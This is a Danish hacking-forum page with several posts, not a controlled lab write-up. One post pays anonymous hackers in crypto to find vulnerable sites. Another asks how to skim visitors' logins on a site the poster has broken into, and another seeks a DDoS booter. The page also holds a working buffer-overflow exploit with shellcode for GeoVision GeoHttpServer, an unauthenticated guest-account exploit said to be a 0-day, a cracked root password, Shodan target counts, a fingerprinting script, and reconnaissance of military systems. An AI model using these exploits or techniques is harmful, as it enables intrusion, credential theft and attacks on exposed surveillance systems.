Shellsec - Diskussion

Kunne du tænke dig at tjene penge på din hacker-hobby?

Sat, 28 Nov 2020 23:05:40 +0100

Hej dygtige Shellsec folk :
Kunne du være interesseret i et lille arbejde som etisk hacker så læs med her.
Jeg har luret med her på forummet igennem nogle år, men kun af ren interesse. Selvom de ting I diskuterer herinde er meget fasicnerende, har jeg absolut ingen forstand på det.
Til gengæld driver jeg en række online medier og lever af affiliate. I den forbindelse har vi startet et nyt website som skal give et overblik over de bedste webhosts, vpn services, wordpress themes/plugins mv.
Som noget ekstra indhold til den side, vil jeg gerne løbende udgive information om cybersikkerhed, password leaks og lign. Og det er her en af jer dygtige shellsec folk kommer ind i billedet.
Hvis du kunne tænke dig at være vores hacker-ekspert, som kan hjælpe os med at holde overblik over websites i Danmark som får lækker informationer, eller du selv kan sondere det danske internet og finde websites, der har hul i sikkerheden og blot venter på at blive hacket, så hører jeg meget gerne fra dig. Materialet bliver brugt til et dansk værktøj i stil med https://haveibeenpwned.com/ (Vi bruger også deres database), og de websites du potentielt måtte find som slækker for sikkerheden, bliver muligvis brugt i månedlige rapporter/artikler. Du kan også hjælpe mig eller vores dygtige content skribenter med baggrundsstof og analyse til artikler som de her https://www.vpnmentor.com/blog/report-dating-apps-leak/
Jeg forstår at du vil arbejde i baggrunden og 100% anonymt, så betalingen for arbejdet kan uden problemer foregå i kryptovaluta og over en chatforbindelse om Telegram.
Hvad betalingen bliver og hvordan det afregnes har jeg brug for input af dig til, men ordentligt arbejde skal selvfølgelig honoreres.
Skriv til mig på Telegram (@kromik100) eller her på forummet. Håber at høre fra et par af jer!

Her er to helt perfekte eksempler på nyheder/materiale som vi godt kunne tænke os at bliver gjort opmærksomme på, når de blev lagt frem i "hacker communtiet"

https://www.shellsec.pw/traad-tinglysnin...olk-ud-fra
https://www.shellsec.pw/traad-nlparty-dk...ails-clear

Venteliste

Sun, 05 Apr 2020 08:36:11 +0200

Har brug for hjælp til at komme i toppen på en venteliste...
Dusør

shell to meterpreter ?

Sat, 04 Apr 2020 21:54:18 +0200

Jeg sidder og laver lidt pentesting opgaver og følger en guide, men der er noget jeg undre mig over.
Jeg har en windows 7 maskine som jeg har kørt EternalBlue på og har fået en "Windows shell" tror jeg det hedder.
Opgaven lyder nu at man så bagefter skal lave en "shell to meterpreter", hvilket jeg har gjort, og har nu to sessions.
De to sessions - https://i.imgur.com/pdrbLe3.png
Windows session - https://i.imgur.com/1nCATcw.png
Meterpreter session - https://i.imgur.com/2FO4dRe.png
Mit spørgsmål - Hvorfor laver man en Meterpreter session efter sin Windows session ? Er det for at kunne vælge mellem Windows og Linux, alt efter hvad man bedst kan lide når man skal bevæge sig rundt på den computer man angriber ?

Aktiedysten 2019

Mon, 07 Oct 2019 13:00:31 +0200

Heeeeeey, Aktiedysten.dk, det kunne være intersant at endelig slå enhedslistens medlem Rune Lund, hvilken anden måde end at vinde aktiedysten. Noget der er intersant ? :)

AutoSploit

Mon, 05 Feb 2018 16:24:12 +0100

Nogen her der har prøvet det? Hvad synes I om det?

Links:
https://github.com/NullArray/AutoSploit
https://www.version2.dk/artikel/nyt-vaer...re-1084283

FORESPØRGSEL - IP via email?

Thu, 19 Oct 2017 12:56:59 +0200

Hej!
Jeg er i den uheldige situation at jeg er blevet snydt for et større beløb.
Jeg har kun en email adresse og konto nr på manden.
Kan man finde frem til en ip eller endnu bedre information på ham, via en email adresse?

På forhånd tak!

Mifare crack.

Tue, 03 Oct 2017 08:27:53 +0200

Hey SS. Jeg er gået igang med et nyt projekt med at cracke diverse mifare kort/chips. Mit mål er at kunne duplikere en chip over på et andet kort. Hvis der er nogen som har prøvet med mifare eller noget lignende må de meget gerne skrive herinde.
Ser frem til at vise mine resultater (hvis det lykkedes).

Synonymordbog.dk

Tue, 22 Aug 2017 09:30:54 +0200

Prøv og tag et hurtig kig på http://www.synonymordbog.dk, altså bare forsjovs skyld.
Den er mega godt kodet.

1.000+ brugere, cookie stealing

Wed, 05 Jul 2017 14:21:02 +0200

Hejsa,
Har adgang til et website med over 1000+ brugere der håndterer ordrer og kort transaktioner.
Siden benytter "OpenBizBox" og har adgang til hele admin-panelet.
Jeg kan ændre alt indenfor ordrer osv, men har tænkt mig at stjæle cookies fra folk der besøger siden.
Hvordan gør jeg dette? Kan redigere html.twig templates fra panelet, så jeg burde kunne injecte noget malicious kode her, hvordan foreslår i jeg bærer mig ad?
UPDATE:
Der er en indbygget funktion i OpenBizBox der gør at man kan slå custom javascript scripts til at blive injected på alle sider, til widgets og den slags.
Udfra det burde jeg kunne session hijacke, men det er nederen (kan allerede logge ind på alle folks accounts fra panelet). Hvordan får jeg stjålet koderne? Noget med at ændre login boksen eller noget?

Cyber Security Base with F‑Secure

Tue, 25 Oct 2016 16:00:06 +0200

Var nu ikke helt sikker på hvor den hørte bedst hjemme, så det blev denne sektion.
Det er et nyt og gratis online kursus fra F-Secure og University of Helsinki.

Citer:Contents of the course series
The course series consists of multiple smaller courses, each centered around a specific theme. These themes include

a brief introduction to cyber security and operational security,

web software development, types of vulnerabilities that are typical to web software, how such vulnerabilities are discovered and then mitigated, and

advanced topics such as secure software architectures and cryptography.

There will be a few case studies as well as projects that participants can work on. At the end of the course series, we’ll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time-frame.
Click the link below to view the course serie’s web page and to start your journey into becoming a cyber security expert!

Work load and prerequisites
There will be programming assignments, essays, quizzes and puzzles throughout the courses, and completing a specific part of a course means working and completing most if not all of them. We expect that individuals work some 2-10 hours per week on the courses depending on their background. Some programming background and ICT experience will be very beneficial.
ECTS credits for Finnish residents
If you reside in Finland, you can get a total of 10 ECTS credits for the course from the Open University of University of Helsinki. Your own school, college or university has the option of accepting these as a part of your studies – you have to, however, ask your local administration whether they will do so. We are looking into the possibility of offering certificates for completion of the course series to all participants as well.
We will start on 25th of October, 2016. A link to the stream / recording of the event (event starting 10AM GMT+3): https://www.helsinki.fi/fi/unitube/video/20543.

Link med info: http://mooc.fi/courses/2016/cybersecurity/

Link til materialet: https://cybersecuritybase.github.io/

Link til den officielle introduktionsvideo, streamet for 7 timer siden: https://www.helsinki.fi/fi/unitube/video...1f2e0f77a2

Kurset kommer til at strække sig nogle måneder ind i 2017, så det kan ikke binges(endnu).

GeoVision GeoHttpServer SEH-Baseret Buffer Overflow

Sun, 10 Jul 2016 18:20:27 +0200

Det er ved at være længe siden jeg kiggede dette igennem, og kan derfor næsten intet huske, så lad os gøre det kort.

I min sidste tråd om GeoVision nævnte jeg følgende:

(18-03-2016, 21:06)MalcolmXI Skrev: De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke).

(30-03-2016, 19:41)MalcolmXI Skrev: GeoHttpServer er en ældre sag, og der er fundet fejl helt tilbage til 2003, men det er også et Utrolig udbredt stykke software, så jeg håber lidt på at få tid til at kigge på det, selvom det umiddelbart ser ud til at være en hærdet fætter, men betydeligt færre angrebsvektorer.

https://www.shellsec.pw/traad-geovision-...ilfoejelse

Det tog ikke mange minutter at finde et Buffer Overflow, som endnu ikke er blevet patched, selvom det er nogle måneder siden jeg kontaktede dem.
Jeg er også ret sikker på jeg ikke er den første til at indberette det, da det er trivielt let at finde, og sårbarheden er tilgængelig allerede Før man logger ind.

Så vidt jeg husker var der faktisk 3 Overflows, hvor kun denne ene lige præcis overskrev vores exception handler. De 3 forms vi kan injecte er forbundet med 'Change password', 'Login' og 'Forgotten password'-funktionerne. I vores tilfælde er det kun muligt at overskrive den sårbare handler, hvis vi benytter 'Change password'-formen, som, så vidt jeg husker, bruger miljøvariabler til at sende vores form-data til den rigtige funktion i WebcamServer.exe processen.

Følgende simple eksempel resulterer i en Messagebox med teksten MalcolmXI! :P

vGeoHttpServer_mbx.py

Citer:#!/usr/bin/env python
# -*- coding: utf-8 -*-
# GeoVision GeoHttpServer SEH-Baseret Buffer Overflow
# Bruger sqlite3.dll til at bypasse SafeSEH, ved hjaelp af en POP POP RET instruktion
# nSEH bruger et negativt short jump i vores kontrollerede buffer-omraade, og hopper derefter tilbage til vores MessageBox shellcode.
# Testet på Windows 7/8 x64
#
# Foelgende simple shellcode aabner en MessageBox med foelgende tekst: 'MalcolmXI!'.
# "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"
# "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 30 tegn

# "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"
# "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
# "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
# "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"
# "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7" 83 tegn

import httplib, sys

nSEH = "\xEB\xD6\xCC\xCC"
SEH = "\xED\x77\x49\x00"
JumpTilShellcode = "\xE9\x14\xFF\xFF\xFF"

ShellcodeDel1 = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c"
ShellcodeDel1 += "\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"

ShellcodeDel2 = "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf"
ShellcodeDel2 += "\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69"
ShellcodeDel2 += "\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
ShellcodeDel2 += "\x8b\x7c\xaf\xfc\x01\xc7\x68\x58\x49\x21\x01\x68\x63\x6f\x6c\x6d\x68"
ShellcodeDel2 += "\x20\x4d\x61\x6c\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"

if len(sys.argv) > 2:
tIP = sys.argv[1]
tPort = sys.argv[2]
print "Sender Exploit"
httpServ = httplib.HTTPConnection(tIP, tPort)
httpServ.connect()
httpServ.request('POST', '/change_password', 'id=' + "\x90" * 38 + ShellcodeDel1 + '&newpwd=' + ShellcodeDel2 + "\xE9\x88" + "\x90" * 114 + JumpTilShellcode + nSEH + SEH)
httpServ.close()

if len(sys.argv) <= 2:
print "Specificer et maal samt en port at forbinde til"
print "python vGeoHttpServer_mbx.py <80>"

Grunden til jeg sender vores shellcode i 2 dele, er for at få nogle ekstra bytes, samt for at mindske antallet af null-bytes, da vi ikke kan komme udenom disse, selv med sikre buffers uden bad chars osv. I realiteten kan vi nøjes med $id eller $newpwd. Man kunne eventuelt også bruge en egg-hunter e. l.
Jeg har kun testet på Windows 7 og 8 x64.

I skal være velkommen til at tælle i en debugger, men jeg mener vi har ca. 270 bytes at gøre godt med, så det er jo stadig begrænset hvad vi har af muligheder.

Man kunne også bruge denne shellcode:https://www.exploit-db.com/exploits/39519/
Der passer godt i størrelsen og er null-free.

Hvis der er nogle 1337 haxXx0rz herinde, så få den lige til at holde op med at crashe.
Jeg går ikke ud fra man kan bruge dette overflow til at opnå et authentication bypass?

Hvis man vil prøve, kan man:
- Hente og installere GV-VMS fra: http://www.geovision.com.tw/english/5_8.asp
- Lave en bruger og logge ind
- Starte WebcamServer.exe fra installationsmappen (Selve programmet installerer også en wakelock service)

Shodan finder selv 59,885 resultater, som dog for nogle måneder siden viste 77K:
https://www.shodan.io/search?query=GeoHttpServer

Som jeg før har nævnt kan man dog ikke regne med Shodan og Dorks, men i stedet selv skanne ved hjælp af f. eks. Nmap eller Masscan.
Nedenstående Nmap script fra den tidligere tråd fingerprinter denne GeoHttpServer, så det er lige til:
vGeo.nse

Kode:
-- Head --

description = [[GeoVision DVR FW-FP]]

author = "MXI"

local shortport = require "shortport"

local http = require "http"

local string = require "string"

-- Rule --

portrule = shortport.http

-- Action --

action = function(host, port)

    local index = "/index.htm"

    local uagent = {header={}}

    uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"

    local response = http.get(host, port, index, uagent)

    if ( response.status == 200 ) then

        local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)")

        if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then

            return "GeoVision DVR: Saarbar?"

        end    

        if ( response.header.server == 'GeoHttpServer' ) then

            if ( title == "Login In" ) then

            return "GeoVision Webcam"

            else

            return "GeoVision Server, men ukendt firmware"

            end

        end

    end

end

Det frække ved denne bundle er, at det:
1) Er Windows computere
2) Er tiltænkt forretninger med et større antal overvågningskameraer

Nu må vi se om jeg har glemt noget, igen, igen, igen...

Ps.
Som i kan se, er dette Ikke min stærke side :D

Booter til ovh

Sun, 12 Jun 2016 23:45:24 +0200

Nogen der ved hvor meget anti ddos OVH køre med? og nogle der kan anbefale en booter der kan trænge igennem ovh?

.

Wed, 01 Jun 2016 21:12:49 +0200

XSS script injection løsningsforslag til udfordring

Sun, 22 May 2016 13:45:19 +0200

Dette er mit løsningsforslag til September 2015 - XSS-udfordring
Problemet med denne webside er at Referer headeren er reflected på siden, og den er ikke sanitized. Man kunne måske fristes til at tro, brugeren ikke kan kontrollere indholdet, og derfor undlader at kontrollere indholdet. Den header viser normalt, hvilken adresse man kommer fra, når man besøger udfordringssiden. Derfor er denne header ikke til stede, hvis man åbner et nyt browser vindue eller åbner en ny tom fane, og så paster linket til udfordringen ind der. Men der er ikke noget i vejen for, selv at tilføje denne, eller andre headers.

Når man ser på sidens source, vil sårbarheden ved første besøg se ud som følger:

Citer:Back

Script injection på denne side, sker mellem gåseøjnene i ovenstående href tag og det er pænest at sørge for, man ikke ødelægger sidens struktur. Man skal forholde sig til den eksisterende html og sørge for, at ", ' og andre tags/elementer stadig virker.

Citer:Back

Jeg har brugt TamperData til at tilføje en "Referer" header med følgende indhold:

Citer:http://eb.dk/" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick

Og det bliver så til:

Citer:http://eb.dk/" onmouseover="document.getElementsByTagName('p')[0].innerHTML='XSSed you'" alt="iTick">Back

Når jeg så lader denne request blive sendt til serveren, før jeg følgende:

SS_1.PNG (Størrelse: 484,17 KB / Downloads: 15)
Det gør at jeg kan hover over "Back", og få teksten til at blive "XSSed you" og linket pejer på eb.dk, i stedet for den side man "kom fra".

SS_2.PNG (Størrelse: 51,25 KB / Downloads: 9)

Dette er mest for at vise, man kan kontrollere alle elementerne på siden. Ajax kan derfor blive interessant også.
Hvis man har lyst, kan man tilføje elementer som f.eks. en form, ændre og slette elementer.

GeoVision DVR Uautoriseret Tilføjelse af Gæstebruger

Fri, 18 Mar 2016 21:06:50 +0100

Eh... Skulle bare have været et par linjer.... Men når man først kommer i gang med at skrive....
Måske lidt i overkanten, men tag hvad i kan bruge.
Skal nok lige få kigget efter fejl og rettelser.

OBS: Jeg har ikke kunne finde disse sårbarheder på nettet, og vil derfor betegne dem som 0-days. Hvis andet er tilfældet, og i finder dem andetsteds, må i godt lige skrive det så jeg kan tage en kigger.

TL;DR: Søg på "geovision" på Shodan og vælg en IP, brug vGeoGuest.htm til at tilføje en gæstebruger, login med guest/guest i Internet Explorer.

Tænkte jeg lige så godt kunne dele denne, da det ikke decideret var det jeg ledte efter.
Egentlig ledte jeg efter en DoS tilstand, som jeg fandt ved lidt manuel fuzzing i en ældre version af GeoVisions firmware, for godt 2 år siden. Denne fejl kunne jo være en form for overflow, som kunne være spændende at kigge på, da man ved 300+ tegns requests, mister forbindelse til serveren, der herefter ikke kan nås ved brug af ping. Det kunne tyde på at hardwaren eller webserveren crasher eller halter, men betyder stadig ikke at vi har at gøre med en sårbarhed der kan udnyttes til andet end DoS.

Dengang skannede jeg en lang række danske IP'er, og lagde mærke til, at GeoVision havde en koncentreret andel af de fundne overvågningsløsninger, sammen med et par andre mærker fra andre producenter.
Men eftersom de har lidt forskellige firmware-versioner til deres DVRs/NVRs, valgte jeg lige hurtigt at tage et kig på en af deres nyeste, og her fandt jeg et par hurtige fejl, som jeg lige så godt kan dele.

Lige hurtigt om mit setup/miljø:
- Kali 2, som bruges til mere eller mindre det hele. Køres fra USB(2.0! - Langsomt).
- Firmware hentes, og der køres strings, file, hexdump osv. for at fastslå arkitektur, dynamic/static linking osv.
- Binwalk og Firmware Modification Toolkit, til analyse og udpakning af filsystem, bootloader, kernel, webserver og hvad der ellers hører til.
Har dog et problem med FMK i Kali 2, så jeg kan ikke kompilere og køre extract-firmware. Har brugt tid nok på det, så gider ikke mere, så længe uncramfs og unsquashfs stadig virker.
Qemu system og static user sammen med Change root, til at emulere filsystemet og webserveren.
GDB(cross-compiled eller Qemus indbyggede) og IDA Pro eller GDB multi-arch til at debugge. Og nej. jeg fatter ikke hvad jeg kigger på i 90% af tilfældende :P

Men nu er det ikke en vejledning til firmware analyse og sårbarhedsopdagelse, så vi må hellere hoppe videre. Der er massere af engelske vejledninger til lige netop det, men det kan være jeg laver en i fremtiden, hvis jeg finder noget ekstra spændende engang.

Det første jeg lagde mærke til under den grundlæggende undersøgelse, var at den kompilerede, eksekverbare fil UserSetting.cgi, ikke tjekker om vi har autoriseret, og har en tilhørende cookie. Dette kan vi bruge til at oprette/fjerne en gæstebruger, ved hjælp af en simpel form. Gæstebrugeren vil have guest/guest som henholdsvis brugernavn og kodeord. Følgende script kan bruges til dette:

vGeoGuest.htm

PHP kode:
DOCTYPE html>
<html>
<head>
<style type="text/css">
h3 {color: white;}
p {background-color:#eef;}

body {
   background-color: #eef;
width:800px; 
margin:0 auto;}

.button {
   background-color: #bdb;
   border: none;
   color: white;
   padding: 15px 32px;
   text-align: center;
   text-decoration: none;
   display: inline-block;
   font-size: 16px;
   margin: 4px 2px;
   cursor: pointer;
font-weight: bold;}

style>head><body>
<img src="http://www.geovision.com.tw/english/images/logo.gif" align="center">
<div id="cnt" style="margin:0 auto;width:800px;background-color:#555;text-align:center;border:1px dotted #f0f">

<form id="geo" action="" method="post">
<h3>IP: h3><input type="text" name="" id="gIP">
<p>Indsæt IP-adressen eller domænet på GeoVision-enhedenp><br />
<h3>Gæstebruger: h3>
<INPUT type="checkbox" name="bEnableGuestCheck" value="0">
<p>Sæt flueben for at tilføje en gæstebruger. Hvis tjekboksen er tom, fjernes den eksisterende gæstebrugerp><br />
<p>p>
<input id='testNameHidden' type='hidden' value="1" name='IsGuestPress'>
<INPUT name=IsGuestPress type=hidden value=1>
<button class="button" onclick="mHost()">Prøv :/button>


<script>
function mHost() {
var host = "http://" + document.getElementById("gIP").value + "/UserSetting.cgi";
   document.getElementById("geo").action = host;

if(document.getElementById("bEnableGuestCheck").checked) {
   document.getElementById('testNameHidden').disabled = true;
}
  
}
script>form>body>div>html> 

Jeg har valgt at bruge Javascript til at håndtere formens action, netop for at undgå, at skulle bruge en server til at køre f. eks. PHP. Dette script skal bare køres i browseren.
Vær opmærksom på, at du skal bruge Internet Explorer for at bruge kameraerne, men kan oprette/fjerne brugere med andre browsere(Har selv brugt Firefox).

Når vi logger ind vil vi få en meget begrænset menu, da det er administratorens, og ikke gæstens opgave at opsætte diverse indstillinger.
Sjovt nok er næste kritiske fejl, at vi ved at indtaste URL'erne på diverse scripts til opsætning, bliver godkendt med vores gæstebruger, og er i stand til at ændre indstillingerne. Eftersom vi har adgang til hele webserveren, har vi også adgang til filnavnene.

Dette firmwares HTM filer:

Spoiler (Click to View)

Søger man på GeoVision på Shodan, dukker der en god portion enheder op.
https://www.shodan.io/search?query=geovision
Google Dorks giver kun en ubetydelig mængde. Hverken Google eller Shodan viser den reelle mængde enheder, så jeg har lavet et lille NSE script til Nmap, som bruger tagget i kildekoden til at finde frem til de sårbare fimwares, samt response-headers til at finde en anden type firmware, som er den type jeg vil kigge på næste gang. De nyere versioner bruger tHTTPd som server-software, hvorimod de ældre versioner bruger GeoHttpServer. Eller måske bruges de til forskelligt hardware? hmm? Stilen af de forskellige firmwares kan ses i manualer for versionerne 8.12-8.x og de individuelle kameraer og videokort. vGeo.nse <div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>-- Head -- description = [[GeoVision DVR FW-FP]] author = "MXI" local shortport = require "shortport" local http = require "http" local string = require "string" -- Rule -- portrule = shortport.http -- Action -- action = function(host, port) local index = "/index.htm" local uagent = {header={}} uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" local response = http.get(host, port, index, uagent) if ( response.status == 200 ) then local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>") if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then return "GeoVision DVR: Saarbar?" end if ( response.header.server == 'GeoHttpServer' ) then if ( title == "Login In" ) then return "GeoVision Webcam" else return "GeoVision Server, men ukendt firmware" end end end end</code></div></div> <div style="text-align: center;" class="mycode_align"></div> De to nyere firmwares jeg har testet har haft "GeoVision Inc. - *" i titlen, så det er den string der søges efter. Samt login-formen ser således ud: <div style="text-align: center;" class="mycode_align"></div> De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke). Lidt forskellig klient-software kan findes på nedenstående ftp: <a href="http://ftp.geovision.tw/ftp/Eason/FTP.txt" target="_blank" rel="noopener" class="mycode_url">http://ftp.geovision.tw/ftp/Eason/FTP.txt</a> Lige til sidst, så tillod jeg mig for sjovt at køre passwd-filen en tur igennem John, og uden hverken GPU eller en specielt stor password-liste, lykkedes det John at komme frem til følgende root-password(Ingen brug af shadow): <blockquote class="mycode_quote"><cite>Citer:</cite>Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 XOP 4x2]) Press 'q' or Ctrl-C to abort, almost any other key for status taipei101 (root) 1g 0:00:00:37 DONE (2016-03-12 21:51) 0.02649g/s 32856p/s 32856c/s 32856C/s taipei101..taiohi1 Use the "--show" option to display all of the cracked passwords reliably Session completed root:$1$$2CCpv4DCVCwkFXJ56NsuF0:0:0:root:/root:/bin/sh bin:*:1:1:bin:/bin:/bin/sh daemon:*:2:2:daemon:/usr/sbin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:100:sync:/bin:/bin/sync ftp:*:14:50:FTP User:/var/ftp: apache:x:48:48:Apache:/var/www:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin nobody:*:65534:65534:nobody:/tmp:/bin/sh guest::65534:65534:guest:/home/guest:/bin/sh admin:x:500:65535:Linux User,,,:/tmp:/bin/sh videoserver:x:500:65535:Linux User,,,:/tmp:/bin/sh</blockquote> Det ser ikke ud til at være blevet delt før, og ved en simpel Google-søgning er der heller ikke meget at hente udover Taipei og Taipei 101. Dog ikke noget password-relateret. Nu har jeg ikke tænkt mig at kigge nærmere på lige netop denne firmware, da jeg for at finde den rigtige version, er nødsaget til at - manuelt(Captcha - kunne måske bruge en solver), udpakke og greppe efter server-software samt en specifikt titel. Det er slet ikke besværligt, men tager sgu lidt tid. Root-passwordet kan i realiteten bruges til hvis man finder yderligere en sårbarhed, såsom noget command injection, telnet-aktivering, code execution osv. som ikke allerede kører som root. Et sjovt eksempel ville være at inficere den software der står for installation af de drivers der skal bruges for at håndtere forbindelsen til selve kameraerne. Herefter kan man tvinge endnu en installation, og få adgang til 'overvågerens' PC. Det er måske lidt overkill, men det er en lidt 'sej' måde at opnå pivoting/lateral movement på. <div style="text-align: center;" class="mycode_align"></div> </article> <article> <h1>Mousejack</h1> Wed, 09 Mar 2016 21:11:53 +0100 MouseJack whitepaper – <a href="https://github.com/RFStorm/mousejack/blob/master/doc/pdf/MouseJack-whitepaper-v1.1.pdf" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack/blo...r-v1.1.pdf</a> Firmware and research tools – <a href="https://github.com/RFStorm/mousejack" target="_blank" rel="noopener" class="mycode_url">https://github.com/RFStorm/mousejack</a> Er jeg den eneste får lyst til at hoppe på ebay og købe billig Crazyradio bare for at lege med det? (er klar over det ikke er al den nødvendlig kode der er tilgængelig) Nogen der har hørt/læst yderligere eller set en POC på det? </article> <article> <h1>KESDH Whitehat Footprinting</h1> Fri, 04 Mar 2016 15:58:39 +0100 Tænkte det kunne være meget sjovt at dele, hvad man kan finde af offentlige informationer, på et system som man rent praktisk ville kunne bruge til lateral movement/pivoting i et relativt HP netværk. Det er alt sammen offentligt information, som jeg har fundet her i eftermiddags, og der er derfor ikke anvendt portscanning eller andre mere lyssky metoder. Jeg siger ikke denne information skulle være hemmeligholdt, jeg siger bare at det er meget værdifuldt for en person, som af en eller anden grund har sat sig i hovedet at skulle have uautoriseret adgang til forsvarets systemer. Jeg tvivler også på, at det rent faktisk er noget folk kan bruge til noget. Desuden skriver jeg på samme tid som jeg læser mig frem, så jeg forbeholder mig retten til fejl og rettelser. I realiteten kan det jeg skriver også være urigtigt og fejlfortolket. Det er op til jer, der rent faktisk læser, at bedømme det. Der bliver ikke anvendt 1337 H3xx00ring, kun lidt Google. Jeg læste nedenstående artikel på v2, og bed mærke i følgende citat: <blockquote class="mycode_quote"><cite>Citer:</cite>Forsvarets nuværende KESDH-system baseret på Captia blev lanceret i 2009 og kostede samlet Forsvaret omkring 200 millioner kroner. Det varede dog ikke længe, før systemet blev forældet på grund af en gammel infrastruktur, der bandt Forsvaret til en ældre versioner af Windows, Microsoft Office og Internet Explorer. Det vil derfor stadig ikke være muligt for Forsvaret at opgradere til Office 2010 og nyere, før det nye ESDH-system kommer op at køre i slutningen af i år. ................... ............... ........... ....... Opgraderingen af systemet gør også op med en lang række besværlige arbejdsgange i Forsvaret. Blandt andet understøtter systemet kun weblogin ved den gamle udgave af Internet Explorer 8, hvilket gør login fra mobile enheder stort set umuligt.</blockquote> <a href="http://www.version2.dk/artikel/forsvaret-dropper-csc-it-udbud-til-flere-hundrede-millioner-kroner-var-alligevel-ikke-spil" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...-ikke-spil</a> Hvorvidt det er Captia eller styresystemet selv der resulterer i denne begrænsning ved jeg ikke, men las os for en god ordens skyld have følgende information i baghovedet: Windows 7 er fra år 2009, og installeres med Internet Explorer 8. Seneste version af Internet Explorer til Windows XP er 8. <a href="http://windows.microsoft.com/da-dk/internet-explorer/which-version-am-i-using#ie=other" target="_blank" rel="noopener" class="mycode_url">http://windows.microsoft.com/da-dk/inter...g#ie=other</a> <a href="https://en.wikipedia.org/wiki/Microsoft_Windows#Windows_Vista" target="_blank" rel="noopener" class="mycode_url">https://en.wikipedia.org/wiki/Microsoft_...dows_Vista</a> Samt systemkravene til Internet Explorer 8, da man aldrig ved om de har downgraded: <blockquote class="mycode_quote"><cite>Citer:</cite>Availability of Windows Internet Explorer 8 System requirements Internet Explorer 8 runs on any of the following operating systems:<ul class="mycode_list"><li>Windows 7, 32-bit versions </li> <li>Windows 7, 64-bit versions </li> <li>Windows Vista, 32-bit versions </li> <li>Windows Vista, 64-bit versions </li> <li>Windows Vista with Service Pack 1 (SP 1) or a later version </li> <li>Windows XP, 32-bit versions with Service Pack 2 (SP2) or a later version </li> <li>Windows XP Professional, 64-bit Edition </li> <li>Windows Server 2003, 32-bit versions with Service Pack 2 (SP2) or a later version </li> <li>Windows Server 2003, 64-bit versions with Service Pack 2 (SP2) or a later version </li> <li>Windows Server 2008, 32-bit, or a later version </li> <li>Windows Server 2008, 64-bit, or a later version </li> </ul> </blockquote> <a href="https://support.microsoft.com/da-dk/kb/944036" target="_blank" rel="noopener" class="mycode_url">https://support.microsoft.com/da-dk/kb/944036</a> Af nyere versioner burde vi altså at kunne udelukke Windows 8, 8.1 og 10. Der blev også nævnt en forældet Office version, og denne ældre artikel fra v2, skrev i 2014 følgende: <blockquote class="mycode_quote"><cite>Citer:</cite>Det er kun lidt over fem år siden, at Forsvaret fik implementeret dets nuværende ESDH-system fra ScanJour i starten af 2009. Systemet kostede samlet omkring 200 mio. kr., men blev hurtigt forældet, da det eksempelvis ikke understøttede Microsoft Office 2010</blockquote> <a href="http://www.version2.dk/artikel/forsvaret-skal-opgradere-foraeldet-it-system-op-mod-400-mio-kr-68461" target="_blank" rel="noopener" class="mycode_url">http://www.version2.dk/artikel/forsvaret...o-kr-68461</a> Hmm. Hvis vi nu kigger på systemkravene til Office 2010 Standart, ser vi følgende: <blockquote class="mycode_quote"><cite>Citer:</cite>Supports only the 32-bit edition of Office 2010: <ul class="mycode_list"><li>Windows XP with Service Pack 3 (SP3) </li> <li>Windows Server 2003 Service Pack 2 (SP2), MSXML 6.0 </li> <li>Windows Server 2003 R2 </li> </ul> Supports both 32-bit or 64-bit editions of Office 2010:<ul class="mycode_list"><li>Windows Vista with Service Pack 1 (SP1) </li> <li>Windows 7 </li> <li>Windows 8 </li> <li>Windows Server 2008 </li> <li>Windows Server 2008 Service Pack 2 (SP2) </li> <li>Windows Server 2008 R2 </li> <li>Windows Server 2008 R2 Service Pack 1 (SP1) </li> <li>Windows Server 2012 </li> <li>Terminal Server </li> <li>Windows on Windows (WOW) which allows installation of 32-bit versions of Office 2010 on 64-bit operating systems, excluding Windows Server 